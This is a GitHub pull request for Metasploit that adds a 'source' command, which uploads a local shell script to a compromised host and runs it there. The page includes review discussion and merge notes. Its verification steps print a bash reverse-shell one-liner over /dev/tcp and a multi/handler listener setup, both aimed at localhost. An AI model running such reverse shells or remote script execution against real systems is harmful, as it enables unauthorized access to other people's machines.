New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add source meta command for shell session #10509

Merged
merged 5 commits into from Nov 26, 2018

Conversation

Projects
None yet
5 participants
@WangYihang
Contributor

WangYihang commented Aug 22, 2018

Description

Implementation of source command
This command allows attack to execute a local script on the remote machine

Verification

Step 1: Attacker side

./msfconsole -qx 'use multi/handler; \
set payload cmd/unix/reverse_bash; \
set LHOST 127.0.0.1; \
set LPORT 4444; \
exploit'

Step 2: Victim side

bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'

Step 3: Attacker side

Create a shell script file

$ cat ../test/test.sh
#!/bin/bash

date
ip addr
sleep 100

Step 4: Attacker side

  • Execute in background
Type `source /tmp/evil.sh n` in metersploit command interface
  • Verify the file /tmp/evil.rb in the attacker's machine will be executed on the remote machine in foreground
  • Verify after you typed the command source /tmp/evil.sh n, you can execute other commands immediately (eg: uname -a), DO NOT have to wait for the end of the execution
[*] Started reverse TCP handler on 127.0.0.1:4444                                                        
                                                                                                         
source
Usage: source [file] [background]                                                                        
                                                                                                         
Execute a local shell script file on remote machine                                                      
This meta command will upload the script then execute it on the remote machine                           
                                                                                                         
background                                                                                               
`y` represent execute the script in background, `n` represent on foreground                              
source ../test/test.sh n                                                                                 
[*] File <../test/test.sh> size: 27, need 1 times writes to upload                                       
[*] Uploading (256/27)                                                                                   
[+] File </tmp/.driLUHxNXQLmlyHjyKNdilgHqxjZaNXF.sh> upload finished                                     
[*] Executing on remote machine foreground                                                               
+ date                                                                                                   
2018年 08月 22日 星期三 21:46:55 CST                                                                     
+ ip addr                                                                                                
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000              
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00                                                
    inet 127.0.0.1/8 scope host lo                                                                       
       valid_lft forever preferred_lft forever                                                           
    inet6 ::1/128 scope host                                                                             
       valid_lft forever preferred_lft forever                                                           
2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000    
    link/ether 10:e7:c6:1f:44:84 brd ff:ff:ff:ff:ff:ff                                                   
    inet 10.25.232.80/24 brd 10.25.232.255 scope global dynamic noprefixroute enp1s0                     
       valid_lft 22278sec preferred_lft 22278sec                                                         
    inet6 fe80::e548:b03b:aa8:7518/64 scope link noprefixroute                                           
       valid_lft forever preferred_lft forever                                                           
[*] Cleaning temp file on remote machine                                                                 
uname -a
Linux sun 4.15.0-32-generic #35-Ubuntu SMP Fri Aug 10 17:58:07 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
if background
print_status("Executing on remote machine background")
print_line(shell_command("nohup sh -x #{remote_file} &"))

This comment has been minimized.

@wvu-r7

wvu-r7 Aug 22, 2018

Contributor

Nice use of xtrace to log executed commands!

This comment has been minimized.

@WangYihang

WangYihang Aug 23, 2018

Contributor

Cool, I will try to test this command~ thank you for your suggestion~

This comment has been minimized.

@wvu-r7

wvu-r7 Aug 23, 2018

Contributor

You're already doing it with -x. :)

This comment has been minimized.

@WangYihang

WangYihang Aug 23, 2018

Contributor

@wvu-r7 Did you mean this tool? https://github.com/johnno1962/Xtrace I found several tools named xtrace, >_<, (strace or ltrace?)

This comment has been minimized.

@wvu-r7

wvu-r7 Aug 23, 2018

Contributor

I mean the functionality of set -x, which is called xtrace:

wvu@kharak:~$ help set | grep -- -x | sed \$d
              xtrace       same as -x
      -x  Print commands and their arguments as they are executed.
wvu@kharak:~$
background = args[1].downcase == 'y'
local_file = args[0]
remote_file = "/tmp/." + ::Rex::Text.rand_text_alpha(32) + ".sh"

This comment has been minimized.

@wvu-r7

wvu-r7 Aug 25, 2018

Contributor

You might want to protect the permissions of this file.

This comment has been minimized.

@WangYihang

WangYihang Aug 30, 2018

Contributor

Sorry, I didn't understand what you mean. The file created here is for temporary use and after use, it will be deleted. I don't understand why I need to protect the permissions of this file.

This comment has been minimized.

@sempervictus

sempervictus Aug 30, 2018

Contributor

@WangYihang: TOCTOU concerns about whether you're executing what you intended, or what someone with access to your system (or the path where this file is created on a remotely mounted FS) while you're working is intending (at time of use, of course).

This comment has been minimized.

@wvu-r7

wvu-r7 Aug 30, 2018

Contributor

A good start is 0600 for a script executed directly by the shell.

This comment has been minimized.

@WangYihang

WangYihang Aug 30, 2018

Contributor

Okay, I will update the code.

@busterb

This comment has been minimized.

Contributor

busterb commented Oct 6, 2018

Jenkins test this please.

@busterb busterb self-assigned this Nov 26, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 26, 2018

Looks good, landing.

@busterb busterb merged commit a83e635 into rapid7:master Nov 26, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Nov 26, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 26, 2018

Release Notes

This adds a source command for shell sessions that allows running a local shell script remotely in a single step.

msjenkins-r7 added a commit that referenced this pull request Nov 26, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment